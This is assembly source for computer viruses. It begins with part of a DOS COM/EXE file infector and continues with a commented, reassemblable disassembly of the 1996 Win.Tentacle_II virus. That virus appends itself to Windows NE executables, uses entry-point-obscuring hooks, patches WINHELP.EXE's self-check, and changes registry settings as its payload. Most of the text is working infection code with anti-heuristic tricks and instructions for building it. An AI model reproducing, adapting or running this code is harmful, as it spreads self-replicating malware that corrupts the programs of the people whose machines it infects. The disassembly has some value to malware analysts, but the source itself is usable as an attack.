get_attributes_ok:
mov ax,3D02h ; open file r/w
int 21h ; DS:DX=filename ptr
jnc openfile_ok
jmp reset_attributes

openfile_ok:
xchg bx,ax ; filehandle to BX

push cs ; DS=ES=CS
push cs
pop ds
pop es

mov ax,5700h ; get file date/time


int 21h
push cx ; save file time
push dx ; save file date

mov ah,3Fh ; read file header


mov dx, (header-v_start) ; DS:DX=buffer to read
mov cx,1Ch ; DOS EXE header size
int 21h

cmp word ptr cs:[header-v_start],"MZ" ; EXE header?


jne probably_not_an_exe
jmp infect_exe
probably_not_an_exe:
cmp word ptr cs:[2AEh],"ZM" ; EXE header?
jne not_an_exe
jmp infect_exe
not_an_exe:
cmp word ptr cs:[header-v_start], -1 ; SYS file?
jne infect_com
jmp restore_filetime

header db 1Ch dup(0C3h) ; 0C3h - ret opcode - quit 1st gen

infect_com:
mov ax,4202h ; goto end of file
xor cx,cx ; CX:DX=0=distance to move
cwd
int 21h

cmp dx,0 ; high word of filesize=0 ?


jbe com_size_ok ; if yes, file is too big
jmp restore_filetime ; to infect
com_size_ok:
push ax ; save filesize
sub ax,(virus_size+3) ; the theoretical offset of
; the jmp if file was infected
cmp ax,word ptr cs:[header-v_start+1] ; equal means
; the file is already infected
pop ax ; restore filesize in AX
jne com_not_infected_yet
jmp restore_filetime
com_not_infected_yet:
mov word ptr cs:[host_type-v_start],"OC" ; set host type
sub ax,3
mov word ptr cs:[jmp_distance-v_start],ax
add ax,3 ; completely useless instruction

mov ah,40h ; write virus body


mov dx,0 ; virus offset in memory
mov cx,virus_size ; CX=size to write
int 21h

mov ax,4200h ; set filepointer to beginning


xor cx,cx ; CX:DX=distance to move=0
cwd
int 21h

mov ah,40h ; write new jump to filestart


mov dx,(new_jmp-v_start) ; DS:DX=ptr to buffer
mov cx,3 ; write three bytes (near jmp)
int 21h

pop dx ; restore old file date in DX


pop cx ; restore old file time in CX
push cx ; save CX again
and cl,00011111b ; CL=seconds from filetime
mov byte ptr cs:[seconds-v_start],cl ; store it
pop cx ; restore CX
and cl,11100000b ; clear seconds from filetime
add cl,1Dh ; mark as infected with seconds=60
jmp set_filetime ; set new filetime

new_jmp:
db 0E9h
jmp_distance dw ?

infect_exe:
cmp word ptr cs:[header-v_start+18h],40h ; Relo table address
jb no_new_exe
jmp restore_filetime ; don't take New EXEs
no_new_exe:
cmp word ptr cs:[header-v_start+1Ah],0 ; Overlay number
je no_overlay
jmp restore_filetime ; don't take overlays
no_overlay:
cmp word ptr cs:[header-v_start+12h],"UC" ; CRC/infection mark
jne not_infected_yet
jmp restore_filetime ; don't reinfect
not_infected_yet:
mov word ptr cs:[host_type-v_start],"XE" ; mark host as EXE

mov ax,word ptr cs:[header-v_start+0Eh] ; save SS


mov cs:[host_ss - v_start],ax
mov ax,word ptr cs:[header-v_start+10h] ; save SP
mov cs:[host_sp - v_start],ax
mov ax,word ptr cs:[header-v_start+16h] ; save CS
mov cs:[host_cs - v_start],ax
mov ax,word ptr cs:[header-v_start+14h] ; save IP
mov cs:[host_ip - v_start],ax

mov ax,4202h ; go to end of file


xor cx,cx ; DX:CX=new file pointer
cwd
int 21h

push bx ; save file handle


push ax ; save filesize
push dx ; save filesize high

mov bx,word ptr cs:[header-v_start+08h] ; header size (paras)


shl bx,4 ; BX=BX*16 : convert to bytes
sub ax,bx ; DX:AX=image size
sbb dx,0
mov cx,10h ; divide by 16
div cx ; calculate new CS/IP
mov word ptr cs:[header-v_start+14h],dx ; IP
mov word ptr cs:[header-v_start+16h],ax ; CS
mov word ptr cs:[header-v_start+0eh],ax ; SS
mov word ptr cs:[header-v_start+10h],0FFFEh ; SP
mov word ptr cs:[header-v_start+12h],"UC" ; CRC/marker

pop dx ; restore filesize to DX:AX


pop ax
add ax,virus_size ; calculate new filesize
adc dx,0

mov cx,200h ; calculate filesize in 512 byte pages


div cx
inc ax ; round up pages
mov word ptr cs:[header-v_start+4],ax ; filesize mod 512
mov word ptr cs:[header-v_start+2],dx ; filesize div 512

pop bx ; restore file handle

mov ah,40h ; write virus to EOF file


mov cx,virus_size ; size to write
mov dx,0 ; virus offset in memory
int 21h

mov ax,4200h ; go to start of file


xor cx,cx ; DX:CX=new position in file=0
cwd
int 21h

mov ah,40h ; write new EXE header


mov dx, (header-v_start) ; DS:DX=buffer to read
mov cx,1Ch ; DOS EXE header size
int 21h

pop dx ; restore old file date in DX


pop cx ; restore old file time in CX
push cx ; save CX again
and cl,00011111b ; CL=seconds from filetime
mov byte ptr cs:[seconds-v_start],cl ; store it
pop cx ; restore CX
and cl,11100000b ; clear seconds from filetime
add cl,1Dh ; mark as infected with seconds=60
jmp set_filetime ; set new filetime
nop ; single-pass assembler shit

int24h_handler:
iret ; Interrupt return

int24h_offset dw ?
int24h_segment dw ?

restore_filetime:
pop dx ; restore old file date in DX
pop cx ; restore old file time in CX

set_filetime:
mov ax,5701h ; set file time/date
int 21h

mov ah,3Eh ; close file


int 21h

mov ax,5700h ; get file time/date


int 21h

reset_attributes:
pop cx ; restore old file attributes
pop ds ; restore pointer to filename
pop dx ; in DS:DX
mov ax,4301h ; set file attributes funct.
int 21h

xor ax,ax ; AX=0


mov ds,ax ; DS=AX=0=IVT segment
mov ax,word ptr cs:[int24h_offset-v_start] ; BX:AX=ptr32 to old
mov bx,word ptr cs:[int24h_segment-v_start] ; int24h handler
cli ; disable interrupts
mov ds:[24h*4],ax ; restore old int24h handler
mov ds:[24h*4+2],bx
sti ; enable interrupts

pop es ; restore segment registers


pop ds
popa ; restore all other registers
jmp org_int21h

host_type dw "OC" ; first generation is a COM


seconds db 0
v_end:

end start
comment %

Name : Win.Tentacle_II
Alias : Shell
Author : ?
Type : direct acting Win16 NE appender
Size : 10608 bytes virus body (because of relocation stuff
infected files increase for at least 10634 bytes)
Origin : ?
When : 1996
Status : was in the wild (distributed in sex newsgroups in 1996)
Disassembled by : Black Jack
Contact me : Black_Jack_VX@hotmail.com | http://www.coderz.net/blackjack

Description:
When the virus gets activated, it starts to search and infect NE EXE files,
first one *.EXE file in the current directory, then two in the C:\WINDOWS
directory, then one in some other possible hardcoded windows directories
(C:\WIN, C:\WIN31, C:\WIN311, C:\WIN95), and then one *.SCR file in the
current dir. While infection the virus creates a temporary file
C:\TENTACLE.$$$ and rebuilds there an infected image of the victim file. When
the infection process is finished this file is copied back over the victim
file and then deleted.
The infection technique is adding another segment with the virus
code at the end of the file. To add its own entry to the segment table, it
checks if there is enough unused room between the end of the NE header tables
and the start of the first segment and aborts infection if not. Then it
shifts back all tables after the segment table (therefore overwriting the
unused fill bytes) and fixes their offsets in the NE header, so that it can
write its own segment descriptor at the end of the segment table. In a similar
way it adds its own entries to the module-reference and the imported-names
table (this is necessary to import two APIs that are used in the payload).
The most interesting feature of the virus is that it was one of the first (if
not the very first) viruses using EPO techniques, that means infecting the
file without modifying its entry point. To do so, it searches the code segment
that contains the entry point for a call to the INITTASK API from KERNEL.DLL,
or, if that one is not found, the THUNRTMAIN API from VBRUN300.DLL, this are
APIs that should be in the very beginning of a program. Then the relocation
item that is associated with the API call is patched in such a way that this
call is redirected to the virus.
While infecting, the virus pays special attention to the WINHELP.EXE files.
This file contains a self-check in Win3.11. And that's why the virus patches
it in a special way, so that this self-check is disabled.
The payload is activated if the virus is run between 1:00am and 1:05am - The
virus drops a file C:\TENTACLE.GIF containing a picture of the violet tentacle
from the classical computer game "the day of the tentacle" and modifies the
registry in such a way that whenever the program associated with .GIF files
is run to view such a file it displays the file dropped by the virus. To do so
it uses two imported APIs RegSetValue and RegQueryValue from SHELL.DLL.
Additionally, if the virus is executed between 1:15am and 2:00am it runs the
opposite effect and undoes the changes in the registry that were done in the
payload.

Reassembly tested with Tasm 3.1 and TLink 3.0 .

TASM /M tenta2
TLINK tenta2

first generation sample is a DOS EXE file and infects all suitable EXE files
in the current directory only.

%
virus_size EQU (offset virus_end - offset virus_start)

.model tiny
.code
.386
org 0

virus_start:
segm_offset dw 0
segm_phys_size dw virus_size
segm_attribs dw 0001110101010000b ; readable code segment with relocs
segm_virt_size dw virus_size

reloc_stuff:
dd 0000FFFFh ; pointers that will become relocated
dd 0000FFFFh ; must be initialised by 0000:FFFF
dd 0000FFFFh

; This is the real start of the relocation data:


dw 3 ; three relocation items

db 3 ; 32bit far pointer


db 1 ; imported ordinal
dw offset RegQueryValue ; offset of relocation item
size_of_reloc_stuff1 EQU ($ - reloc_stuff)
dw 0 ; will become module-reference index
reloc_stuff2 dw 6 ; ordinal RegQueryValue

db 3 ; 32bit far pointer


db 1 ; imported ordinal
dw offset RegSetValue ; offset of relocation item
size_of_reloc_stuff2 EQU ($ - reloc_stuff2)
dw 0 ; will become module-reference index
reloc_stuff3 dw 5 ; ordinal RegSetValue

db 3 ; 32bit far pointer


db 1 ; imported ordinal
dw offset org_entry; offset of relocation item
size_of_reloc_stuff3 EQU ($ - reloc_stuff3)
dw 0 ; will become module-reference index
dw 0 ; will become ordinal of hooked API

virus_entry:
push ds ; save DS
pusha ; save all registers

push ss ; DS=SS
pop ds

sub sp,size stack_frame ; reserve room on stack


mov bp,sp ; setup stack frame

mov ah,1Ah ; set DTA to DS:DX


lea dx,[bp.dta] ; DS:DX=our DTA in our stack frame
int 21h

mov bx,1
mov cx,offset empty_string
mov dx,offset exe_wildcard
CALL infect_directory ; infect one EXE file in current dir
mov bx,2
mov cx,offset C_windows
mov dx,offset exe_wildcard
CALL infect_directory ; infect two EXE files in C:\WINDOWS

mov bx,1
mov cx,offset C_win
mov dx,offset exe_wildcard
CALL infect_directory ; infect one EXE file in C:\WIN

mov bx,1
mov cx,offset C_win31
mov dx,offset exe_wildcard
CALL infect_directory ; infect one EXE file in C:\WIN31

mov bx,1
mov cx,offset C_win311
mov dx,offset exe_wildcard
CALL infect_directory ; infect one EXE file in C:\WIN311

mov bx,1
mov cx,offset C_win95
mov dx,offset exe_wildcard
CALL infect_directory ; infect one EXE file in C:\WIN95

mov bx,1
mov cx,offset empty_string
mov dx,offset scr_wildcard
CALL infect_directory ; infect one SCR in current dir

mov ah,1Ah ; set DTA to DS:DX


mov dx,7Fh ; DX=80h (standart DTA offset)
inc dx
push ds ; save DS
push es ; DS=ES=PSP (or equivalent) segment
pop ds
int 21h

pop ds ; restore DS

mov ah,2Ch ; get the system time to CX/DX


int 21h ; CH=hours, CL=minutes, DH=seconds
; DL=1/100 seconds

cmp cx,100h ; is it before 1:00am ?


JB restore_host ; if yes, no payload
cmp cx,105h ; is it before 1:05am ?
JB change_gif_cmdline ; call payload between 1:00 and 1:05
cmp cx,10Fh ; is it before 1:15am ?
JB restore_host ; if yes, no payload
cmp cx,200h ; is it after 2:00am ?
JAE restore_host ; if yes, no payload
mov ax,0 ; restore old gif commandline
JMP call_payload ; call payload between 1:15 and 2:00
change_gif_cmdline:
mov ax,1 ; change gif commandline to our file
call_payload:
CALL payload ; play with the gif commandline in
; the win16 "registry".

restore_host:
add sp,size stack_frame ; free room on stack

popa ; restore all registers


pop ds ; restore DS
JMP cs:org_entry ; jump to the API that was hooked
; for the EPO while infection.

C_win db "C:\WIN\", 0

; The following two subroutines are not used in the whole virus. I guess that
; they were just used in the first generation sample, and accidentally left
; in by the virus author. That's why I also used them in the first generation
; carrier of the disassembly.

encrypt_wildcard:
push si ; save SI
push di ; save DI
push es ; save ES

push ds ; ES=DS
pop es

mov di,si ; DI=SI


xor al,al ; AL=0
mov cx,0FFFFh ; search whole segment
repne scasb ; search for the end of the string
dec di ; go back to the terminating zero
mov ax,di ; AX=end of string
; SI=start of string
sub ax,si ; AX=length of string

pop es ; restore ES
pop di ; restore DI

mov cx,ax ; CX=length of string

encrypt_wildcard_loop:
inc byte ptr [si] ; encrypt one byte from string
inc si ; next byte
loop encrypt_wildcard_loop

pop si ; restore SI

RET

encrypt_path:
push si ; save SI
push di ; save DI
push es ; save ES

push ds ; ES=DS
pop es

mov di,si ; DI=SI


xor al,al ; AL=0
mov cx,0FFFFh ; search whole segment
repne scasb ; search for the end of the string
dec di ; go back to the terminating zero
mov ax,di ; AX=end of string
; SI=start of string
sub ax,si ; AX=length of string

pop es ; restore ES
pop di ; restore DI

mov cx,ax ; CX=length of string

encrypt_path_loop:
dec byte ptr [si] ; encrypt one byte from string
inc si ; next byte
loop encrypt_path_loop

pop SI ; restore SI

RET

; ----- DECRYPT PATH STRING -------------------------------------------------


; Entry:
; SI - pointer to source buffer
; DI - pointer to destination buffer
; Exit:
; DI - end of destination buffer

decrypt_path:
cld ; clear direction flag

push di ; save DI
push es ; save ES

push ds ; ES=DS
pop es

mov di,si ; DI=SI


xor al,al ; AL=0
mov cx,0FFFFh ; search whole segment
repne scasb ; search for the end of the string
dec di ; go back to the terminating zero
mov ax,di ; AX=end of string
; SI=start of string
sub ax,si ; AX=length of string

pop es ; restore ES
pop di ; restore DI

mov cx,ax ; CX=length of string


inc cx ; because the LOOP immedeately follows
JMP loop_decrypt_path

decrypt_path_loop:
lodsb ; load a byte from source string
inc al ; decrypt it
stosb ; store decrypted byte
loop_decrypt_path:
loop decrypt_path_loop

movsb ; move terminating zero


RET

; ----- DECRYPT WINDCARD STRING ---------------------------------------------


; Entry:
; SI - pointer to source buffer
; DI - pointer to destination buffer
; Exit:
; DI - end of destination buffer

decrypt_wildcard:
cld ; clear direction flag

push di ; save DI
push es ; save ES

push ds ; ES=DS
pop es

mov di,si ; DI=SI


xor al,al ; AL=0
mov cx,0FFFFh ; search whole segment
repne scasb ; search for the end of the string
dec di ; go back to the terminating zero
mov ax,di ; AX=end of string
; SI=start of string
sub ax,si ; AX=length of string

pop es ; restore ES
pop di ; restore DI

mov cx,ax ; CX=length of string


inc cx ; because the LOOP immedeately follows
JMP loop_decrypt_wildcard

decrypt_wildcard_loop:
lodsb ; load a byte from source string
dec al ; decrypt it
stosb ; store decrypted byte
loop_decrypt_wildcard:
loop decrypt_wildcard_loop

movsb ; move terminating zero


RET

C_windows db "C:\WINDOWS\"
empty_string db 0

; ----- INFECT A DIRECTORY --------------------------------------------------


;
; INPUT:
; BX - number of files to infect
; CX - ptr to path to infect (encrypted)
; DX - ptr to file wildcard ("*.EXE" or "*.SCR", also encrypted)

infect_directory:
push ds ; save DS
push es ; save ES

push cs ; DS=CS
pop ds

push ss ; ES=SS
pop es

mov si,cx ; SI=ptr to path to decrypt


lea di,[bp.full_filespec] ; DI=ptr to where full wildcard will
; be stored ("C:\path\*.ext")
push cx ; save CX (pointer to path)
CALL decrypt_path ; decrypt the path to full_filespec

dec di ; skip the terminating zero

mov si,dx
CALL decrypt_wildcard ; decrypt the wilcard to full_filespec

pop si ; restore ptr to path in SI


lea di,[bp.full_filename]
CALL decrypt_path
dec di ; skip the terminating zero

pop es ; restore ES
pop ds ; restore DS

mov ah,4Eh ; find first file


mov cx,2 ; normal and hidden files
lea dx,[bp.full_filespec]
JMP do_file_search

do_file:
push es ; save ES
push di ; save DI

push ss ; ES=SS
pop es

cld ; clear direction flag


lea si,[bp.dta+1Eh] ; SI=ptr to found filename in DTA
; DI points after the path in
; full_filename
mov cx,13 ; 8.3 filename (zero terminated)
rep movsb ; copy filename

pop di ; restore DI
pop es ; restore ES

test byte ptr [bp.dta+15h],1 ; read only attribute set?


JZ not_readonly

push dx ; save DX

mov ax,3000h ; AX=4301h (set file attributes)


add ax,1301h
xor ch,ch ; set high byte of attributes to zero
mov cl,[bp.dta+15h] ; CL=low byte of attributes
;* and cx,0FFFEh ; delete read-only attribute
db 83h,0E1h,0FEh ; fixup - byte match
lea dx,[bp.full_filename] ; DS:DX=ptr to filename (with path)
int 21h

pop dx ; restore DX

JC findnext ; error? if so, search on

not_readonly:
CALL infect_file ; infect the file!
JC findnext ; on error while infecting search on!
dec bx ; decrement infection counter
JZ done_directory ; enough files infected?
findnext:
mov ah,4Fh ; find next file

do_file_search:
int 21h ; do the file search
JNC do_file ; if no error happened, process file

done_directory:
RET

C_win31 db "C:\WIN31\", 0

exe_wildcard db "*.EXE", 0
scr_wildcard db "*.SCR", 0

; ----- INFECT THE FILE -----------------------------------------------------

infect_file:
pushad ; save all 32bit registers

mov ax,3D00h ; open file read-only


lea dx,[bp.full_filename] ; DS:DX=pointer to filename
int 21h
JC exit_infect ; exit on error
mov bx,ax ; file handle to BX
mov [bp.source_handle],ax ; save file handle

CALL get_file_date_time_size

mov ah,3Fh ; read DOS header


mov cx,64 ; DOS header size
lea dx,[bp.rw_buffer] ; Load effective addr
int 21h
JC close_file

mov ax,word ptr [bp.rw_buffer] ; AX=exe marker


dec ax ; anti-heuristic
cmp ax,"ZM"-1 ; EXE file?
JNE close_file ; close if not

;* cmp word ptr [bp.rw_buffer+0Ch],0FFFEh ; maxmem item in DOS


; header is infection marker
db 81h,0BEh,0A9h,0,0FEh,0FFh ; fixup - byte match
JE close_file ; if equal, file is already infected

;* cmp word ptr [bp.rw_buffer+0Ch],0FFFFh ; maxmem must be standart


db 81h,0BEh,0A9h,0,0FFh,0FFh ; fixup - byte match
JNE close_file ; if not, don't infect

mov word ptr [bp.rw_buffer+0Ch],0FFFEh ; mark as infected


cmp word ptr [bp.rw_buffer+18h],40h ; new exe file?
JB close_file ; if not, then close

; set tmp_filename to "C:\TENTACLE.$$$", 0


mov dword ptr [bp.tmp_filename+6],0F59E6305h
add dword ptr [bp.tmp_filename+6],56A4DE4Fh
mov word ptr [bp.tmp_filename+0],":C"
mov dword ptr [bp.tmp_filename+10],"$$.E"
mov dword ptr [bp.tmp_filename+2],0B1704BC2h
add dword ptr [bp.tmp_filename+2],9CD5089Ah
mov word ptr [bp.tmp_filename+14],"$"
mov ah,3Ch ; create temporary file
mov cx,2 ; with hidden attributes
lea dx,[bp.tmp_filename] ; DS:DX=ptr to filename
int 21h
JC close_file ; exit on error
mov [bp.dest_handle],ax ; save temp file handle

mov ah,40h ; write DOS header of temp file


mov bx,[bp.dest_handle] ; BX=file handle
mov cx,64 ; CX=length to write
lea dx,[bp.rw_buffer] ; DS:DX=address write buffer
int 21h
JC close_tmp_file

mov ecx,dword ptr [bp.rw_buffer+3Ch] ; ECX=new exe header offset


mov [bp.new_header_offs],ecx; store it
sub ecx,64 ; size of dos header (already written)
CALL copy_file_block ; copy rest of DOS stub
JC close_tmp_file

mov bx,[bp.source_handle] ; BX=handle of victim file


mov ah,3Fh ; read NE header
mov cx,64 ; size of NE header
lea dx,[bp.rw_buffer] ; DX=offset of buffer
int 21h
JC close_tmp_file

mov ax,word ptr [bp.rw_buffer] ; AX=new exe marker


inc ax ; anti-heuristic
cmp ax,"EN"+1 ; NE exe file?
JNE close_tmp_file ; if not, then abort infection

mov cl,byte ptr [bp.rw_buffer+32h] ; CL=alignment shift


mov eax,1 ; EAX=1
shl eax,cl ; EAX=alignment unit
mov [bp.alignment_unit],eax ; save it
mov cl,byte ptr [bp.rw_buffer+32h] ; CL=alignment shift
mov eax,[bp.file_size] ; EAX=filesize
shr eax,cl ; EAX=filesize in alignment units
mov [bp.new_sect_descr+0],ax ; save it as offset for the new
; segment that is going to be created
mov eax,[bp.alignment_unit] ; EAX=alignment unit
dec eax ; set all bits below alignemt
test eax,[bp.file_size] ; filesize already aligned?
JZ filesize_already_aligned
inc word ptr [bp.new_sect_descr+0] ; if not, round it up
filesize_already_aligned:
mov ax,cs:segm_phys_size ; copy physical size of segment
mov [bp.new_sect_descr+2],ax
mov ax,cs:segm_attribs ; copy segment attributes
mov [bp.new_sect_descr+4],ax
mov ax,cs:segm_virt_size ; copy virutal size of segment
mov [bp.new_sect_descr+6],ax

cmp word ptr [bp.rw_buffer+22h],40h ;is the segment table directly


; after the NE header (standart case)?
JNE close_tmp_file ; if not, better not infect the file

CALL EPO
JC close_tmp_file
mov [bp.module_ordinal],eax ; save module index and ordinal
mov [bp.our_reloc_offs],edx ; save offset of relocation item
xor eax,eax ; EAX=0
mov ax,word ptr [bp.rw_buffer+22h] ; EAX=offset of segment
; descriptor table from NE hdr
add eax,[bp.new_header_offs]; EAX=offset of segment descriptor
; table from file start

push eax ; CX:DX=EAX


pop dx
pop cx
mov ax,4200h ; go to segment descriptor table
int 21h

mov ah,3Fh ; read the offset of the first segment


mov cx,2 ; read a word
lea dx,[bp.first_segm_offs] ; DX=offset read buffer
int 21h
JC close_tmp_file

mov ax,4201h ; move file pointer relative to


; current position
mov cx,-1 ; CX:DX=-2 (new filepointer position)
mov dx,-2
int 21h ; set the filepointer back to the
; start of the segment table
JC close_tmp_file

xor eax,eax ; EAX=0


mov ax,word ptr [bp.first_segm_offs] ; EAX=aligned file offset
; of first segment
mul [bp.alignment_unit] ; EAX=file offset of the 1st segment
mov [bp.first_segm_offs],eax; save it

mov ebx,dword ptr [bp.rw_buffer+2Ch]


; EBX=beginning of the nonresident-name table (relative to filestart).
; This should be the last table in the NE header.

xor ecx,ecx ; ECX=0


mov cx,word ptr [bp.rw_buffer+20h] ; ECX=size of nonresident name
; table in bytes
add ebx,ecx ; EBX=size of NE header + all tables
mov dword ptr [bp.end_of_NE_hdr],ebx

sub eax,ebx ; EAX=free room between the end of


; the NE header and the first segment

;* cmp eax,10h ; is there enough room left so we can


; add our stuff (a segment descriptor,
; a module reference and an imported
; name) ?
db 66h,83h,0F8h,10h ; fixup - byte match
JL close_tmp_file ; if not, we can't infect the file

mov ax,word ptr [bp.rw_buffer+1Ch] ; segment count


inc ax ; add another segment
mov word ptr [bp.rw_buffer+1Ch],ax ; save new segment count
mov word ptr [bp.new_entry_CS],ax ; new entry segment index
mov word ptr [bp.new_entry_IP],offset virus_entry ; set new
; entry IP
and byte ptr [bp.rw_buffer+37h],011110111b ; windows flags:
; kill gangload area

; fixup the offsets of the other NE header tables (all are after the segment
; table and therefore shifted back). It is assumed that all tables are in the
; same order in the file as their offsets are stored in the NE header (except
; for the entry table, which should be the second last).

add word ptr [bp.rw_buffer+4h],16 ; entry table


add word ptr [bp.rw_buffer+24h],8 ; resource table
add word ptr [bp.rw_buffer+26h],8 ; resident-name table
add word ptr [bp.rw_buffer+28h],8 ; module-reference table
add word ptr [bp.rw_buffer+2Ah],10 ; imported-name table
add dword ptr [bp.rw_buffer+2Ch],16 ; nonresident-name table

inc word ptr [bp.rw_buffer+1Eh] ; one more entry in


; module-reference table

mov ah,40h ; write modified NE header to tmp file


mov bx,[bp.dest_handle] ; BX=temp file handle
mov cx,64 ; NE header size
lea dx,[bp.rw_buffer] ; DX=write buffer offset
int 21h
JC close_tmp_file

xor ecx,ecx ; ECX=0


mov cx,word ptr [bp.rw_buffer+1Ch] ; EAX=number of segments
dec cx ; ECX=old number of segments
shl cx,3 ; shl 3 means mul 8 (size of a
; segment descriptor)
; ECX=old size of segm descriptor tbl
CALL copy_file_block ; copy segment descriptor table
JC close_tmp_file

mov ah,40h ; write our own segment descriptor


; to the file
mov cx,8 ; size of a segment descriptor
lea dx,[bp.new_sect_descr] ; DX=offset of write buffer
int 21h
JC close_tmp_file

xor ecx,ecx ; ECX=0


mov cx,word ptr [bp.rw_buffer+2Ah] ; ECX=offset of imported-name
; table from NE header
mov ax,word ptr [bp.rw_buffer+1Ch] ; entries in segment table
dec ax ; AX=old number of segments
shl ax,3 ; multiply with 8 (size of a
; segment descriptor)
add ax,word ptr [bp.rw_buffer+22h] ; add offset of segment table
; (from NE header)
; AX=offset end of segment table
; relative to the NE header
sub cx,ax ; CX=length of stuff between the
; segment table and the imported-name
; table (resource, resident-name and
; module-reference tables)
sub cx,10 ; because the imported-name table
; offset has already been increased
; by 10 before
CALL copy_file_block ; copy all those tables
JC close_tmp_file

mov ax,word ptr [bp.rw_buffer+4] ; offset entry table (from


; NE header)
sub ax,6 ; AX=end of old imported-name table

sub ax,word ptr [bp.rw_buffer+2Ah] ; ECX=offset of imported-name


; table from NE header
mov word ptr [bp.tmp_buffer],ax ; AX=offset into imported-name
; table (the one of the module
; name we're going to add)

mov ah,40h ; append our new entry into the


; module reference table, the offset
; of the new module name
mov cx,2 ; write one word
lea dx,[bp.tmp_buffer] ; DS:DX=pointer to write buffer
int 21h
JC close_tmp_file

xor ecx,ecx ; ECX=0


mov cx,word ptr [bp.rw_buffer+4] ; offset entry table (from
; NE header)
sub cx,6 ; CX=end of old imported-name table
sub cx,word ptr [bp.rw_buffer+2Ah] ; offset of imported-names
; table from NE header
CALL copy_file_block ; copy imported-name table
JC close_tmp_file

mov ah,40h ; append our module name to the


; imported-name table
mov cx,6 ; length to write
mov word ptr [bp.tmp_buffer+4],"LL" ; create the string
mov dword ptr [bp.tmp_buffer],6DBBFE87h ; 5, "SHELL"
add dword ptr [bp.tmp_buffer],0D78C547Eh ; in tmp_buffer
lea dx,[bp.tmp_buffer] ; DS:DX=pointer to write buffer
int 21h
JC close_tmp_file

mov cx,word ptr [bp.end_of_NE_hdr] ; end of NE header+all tables


; (offset from filestart
sub cx,word ptr [bp.rw_buffer+4] ; offset entry table (from
; NE header)
add cx,word ptr [bp.new_header_offs]; BUG! this should be a sub,
; no add! but because the
; filepointer is set new
; immedeately afterwards, this
; never causes any problems.
CALL copy_file_block ; copy the rest of the header
; (entry and nonresident-name tables)
JC close_tmp_file

mov ax,4200h ; set filepointer in the destination


; (temp) file to the start of the
; first segment.
push dword ptr [bp.first_segm_offs]
pop dx ; CX:DX=first segment offset
pop cx
int 21h
JC close_tmp_file

mov ax,4200h ; set filepointer in the source file


; to the start of the first segment
mov bx,[bp.source_handle]
push dword ptr [bp.first_segm_offs]
pop dx ; CX:DX=first segment offset
pop cx
int 21h
JC close_tmp_file
mov ecx,0FFFFFFFFh ; whole file body
CALL copy_file_block ; copy the file body (all segments
; and relocations)
JC close_tmp_file

xor eax,eax ; EAX=0


mov ax,[bp.new_sect_descr+0]; EAX=aligned offset of our segment
mov cl,byte ptr [bp.rw_buffer+32h] ; CL=alignment shift
shl eax,cl ; EAX=offset of our segment in bytes

push eax ; CX:DX=EAX


pop dx
pop cx
mov ax,4200h ; go to our segment offset in file
mov bx,[bp.dest_handle] ; BX=temp file handle
int 21h
JC close_tmp_file

mov ah,40h ; write virus body to file


mov cx,(RegQueryValue-virus_start) ; write whole virus body
; excluding the three pointers that
; must be relocated and therefore
; initialised with 0000:FFFF
mov dx,offset virus_start ; DX=offset write buffer=virus body
push ds ; save DS
push cs ; DS=CS
pop ds
int 21h

pop ds ; restore DS
JC close_tmp_file

mov ah,40h ; write relocation stuff


mov cx,size_of_reloc_stuff1 ; size of relocation stuff
mov dx,offset reloc_stuff ; DX=offset write buffer
push ds ; save DS
push cs ; DS=CS
pop ds
int 21h

pop ds ; restore DS
JC close_tmp_file

mov ah,40h ; write module index


mov cx,2 ; one word
lea dx,ss:[bp.rw_buffer+1Eh]; number of entries in module
; reference table - our module
; reference is the last
int 21h
JC close_tmp_file

mov ah,40h ; write relocation stuff


mov cx,size_of_reloc_stuff2 ; size of relocation stuff
mov dx,offset reloc_stuff2 ; DX=offset write buffer
push ds ; save DS
push cs ; DS=CS
pop ds
int 21h

pop ds ; restore DS
JC close_tmp_file

mov ah,40h ; write module index


mov cx,2 ; one word
lea dx,ss:[bp.rw_buffer+1Eh]; number of entries in module
; reference table - our module
; reference is the last
int 21h
JC close_tmp_file

mov ah,40h ; write relocation stuff


mov cx,size_of_reloc_stuff3 ; size of relocation stuff
mov dx,offset reloc_stuff3 ; DX=offset write buffer
push ds ; save DS
push cs ; DS=CS
pop ds
int 21h

pop ds
JC close_tmp_file

mov ah,40h ; write the reference to the API


; we hooked for the EOP
mov cx,2 ; CX=4 (size to write)
shl cx,1 ; ???
lea dx,[bp.module_ordinal] ; DS:DX=pointer to write buffer
int 21h
JC close_tmp_file

push [bp.our_reloc_offs] ; CX:DX=offset of the relocation item


pop dx ; that has to be modifies
pop cx
mov ax,4200h ; set filepointer relative to
int 21h ; filestart
JC close_tmp_file

mov ah,40h ; write relocation type


mov cx,2 ; one word
mov word ptr [bp.tmp_buffer],3 ; 32bit far ptr/internal reference
lea dx,[bp.tmp_buffer] ; DS:DX=pointer to write buffer
int 21h
JC close_tmp_file

mov ax,4201h ; set new file pointer relative to


; current position
mov cx,0 ; CX:DX=2 (skip the offset of the
mov dx,2 ; dword that must be relocated)
int 21h
JC close_tmp_file

mov ah,40h ; write a far pointer to the virus


; entrypoint.
mov cx,2 ; CX=4 (size to write)
shl cx,1 ; ???
lea dx,[bp.new_entry_CS] ; DS:DX=pointer to write buffer
int 21h
JC close_tmp_file

cmp dword ptr [bp.dta+24h],"XE.P" ; check the filename of the


JNE not_winhelp ; victim for "WINHELP.EXE" and try to
mov eax,dword ptr [bp.dta+20h] ; patch it if the filename matches
add eax,98F5548Ah
cmp eax,"LEHN"+98F5548Ah
JNE not_winhelp
cmp word ptr [bp.dta+28h],"E"
JNE not_winhelp
cmp word ptr [bp.dta+1Eh],"IW"
JNE not_winhelp
CALL patch_winhelp
not_winhelp:

mov ah,3Eh ; close temp file


int 21h

mov bx,[bp.source_handle] ; BX=victim file handle


mov ah,3Eh ; close victim file
int 21h

lea dx,[bp.tmp_filename] ; DS:DX=pointer to temp file name


mov ax,3D00h ; reopen temp file read-only
int 21h

JC delete_tmp_file
mov [bp.source_handle],ax ; save handle

mov ah,3Ch ; truncate victim file


mov cx,0 ; no attributes
lea dx,[bp.full_filename] ; DS:DX=ptr to full victim filename
int 21h
JC delete_tmp_file

mov bx,ax ; handle to BX


mov [bp.dest_handle],ax ; save handle

mov ecx,0FFFFFFFFh ; copy the whole temp file over the


CALL copy_file_block ; victim file

mov ax,3000h ; AX=5701h - set file date and time


add ax,2701h
mov bx,[bp.dest_handle] ; BX=handle of victim file
mov dx,[bp.file_date] ; CX=old file date
mov cx,[bp.file_time] ; DX=old file time
int 21h

mov ah,3Eh ; close victim file


int 21h

mov bx,[bp.source_handle] ; BX=handle of temp file


mov ah,3Eh ; close temp file
int 21h

